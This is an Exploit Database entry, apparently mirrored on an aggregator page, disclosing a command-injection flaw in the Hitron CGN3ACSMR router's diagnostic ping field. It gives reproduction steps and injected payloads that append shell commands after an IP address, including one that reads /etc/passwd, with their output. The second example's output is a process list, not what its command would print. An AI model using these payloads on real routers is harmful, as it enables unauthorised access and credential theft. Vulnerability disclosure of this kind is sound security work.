Hitron Router CGN3ACSMR 4.5.8.16 – Arbitrary Code Execution

• Exploit Database
• 17 阅读

• 作者： Dolev Farhi
  日期： 2015-10-30
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38575/

• # Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution 
  # Author: Dolev Farhi (dolevf at protonmail.ch)
  # Date: 29-10-2015
  # Vendor homepage: http://www.hitrontech.com/en/index.php
  # Software version: 4.5.8.16
  # Hardware version: 1A
  
  # Details:
  Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI).
  This interface is vulnerable to code injection using the && argument after the IP address.
  
  # Steps to reproduce:
  1. Navigate to the dashboard
  2. Navigate to the admin tab
  3. Type an ip address in the Destination form
  4. append any code you want after the ip.
  
  Example one: 
  8.8.8.8 && cat /etc/passwd
  
  Result
  
  root:$1$27272727:0:0::/:/bin/false
  nobody:$1$27272727:65535:65535::/:/bin/false
  rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
  =============Complete==============
  
  
  
  Example two:
  8.8.8.8 && ip a 
  PID USER VSZ STAT COMMAND
  1 root 1268 S init
  2 root 0 SW [kthreadd]
  3 root 0 SW [ksoftirqd/0]
  5 root 0 SW [kworker/u:0]
  6 root 0 SW< [khelper]
  7 root 0 SW [irq/74-hw_mutex]
  8 root 0 SW [sync_supers]
  9 root 0 SW [bdi-default]
  10 root 0 SW< [kblockd]
  11 root 0 SW< [gPunitWorkqueue]
  12 root 0 SW [irq/79-punit_in]
  13 root 0 SW [kswapd0]
  14 root 0 SW< [crypto]